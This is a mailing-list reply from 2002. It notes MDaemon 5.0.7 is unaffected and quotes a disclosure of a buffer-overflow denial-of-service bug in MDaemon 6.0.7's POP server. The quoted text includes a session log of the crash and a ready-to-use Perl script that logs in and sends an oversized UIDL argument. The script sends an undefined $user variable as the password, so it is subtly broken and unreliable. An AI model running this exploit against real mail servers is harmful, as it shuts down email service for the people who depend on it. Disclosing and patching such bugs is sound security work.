5.0.7 not vulnerable (tested on registered pro server). tested dele and uidl both with over 40b of 1. -Karl Pietri ----- Original Message ----- From: "D4rkGr3y" <grey_1999@mail.ru> To: <bugtraq@securityfocus.com>; <submissions@packetstormsecurity.com>; <vulnwatch@vulnwatch.org> Sent: Sunday, October 27, 2002 11:49 AM Subject: MDaemon SMTP/POP/IMAP server DoS > ###################################################### > #Product: MDaemon SMTP/POP/IMAP server # > #Authors: Alt-N Technologies Ltd [www.mdaemon.com] # > #Vulnerable versions: v.6.0.7 and bellow # > #Vulnerability: buffer overflow # > #Bug&exploit by D4rkGr3y [www.dhgroup.org] # > ###################################################### > > #Overview#--------------------------------------------------------------# > From MDaemon's help file: > "MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services > commonplace on UNIX hosts and the Internet to Windows based servers > and microcomputers. MDaemon is designed to manage the email needs of > any number of individual users and comes complete with a powerful set > of integrated tools for managing mail accounts and message formats. > MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete > with LDAP support, an integrated browser-based email client, content > filtering, spam blockers, extensive security features, and more." > > #Problem#----------------------------------------------------------------# > Bug founded in MDaemon's pop-server. It's possible to kill MDaemon by > sending long arguments (32b and above) with DELE or UIDL commands. > To do this u must have at least mail-account on vulnerable host. > After geting long request from client, all MDaemon's Services will be > closed (smtp, imap, pop, (?)worldclient). > Here the log of attack on local MDaemon POP-server: > > +OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7 <MDAEMON-F200210 > 271036.AA3656130MD0012@dark.ru> > USER D4rkGr3y > +OK D4rkGr3y... Recipient ok > PASS cool-pass > +OK D4rkGr3y@dark.ru's mailbox has 1 total messages (18356 octets). > UIDL 11111111111111111111111111111111 > > Connection to host lost... > > #Exploit#----------------------------------------------------------------# > > #!/usr/bin/perl > #MDaemon SMTP/POP/IMAP server remote DoS exploit by D4rkGr3y > use IO::Socket; > $host = "[vuln_host]"; > $login = "[login]"; > $pass = "[pass]"; > $port = "110"; > $data = "1"; > $num = "32"; > $buf .= $data x $num; > $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) > or die "Couldn't connect: @!\n"; > print $socket "USER $login\n"; > print $socket "PASS $user\n"; > print $socket "UIDL $buf\n"; > close($socket); > > #EOF > > Best regards www.dhgroup.org > D4rkGr3y icq 540981 > > >
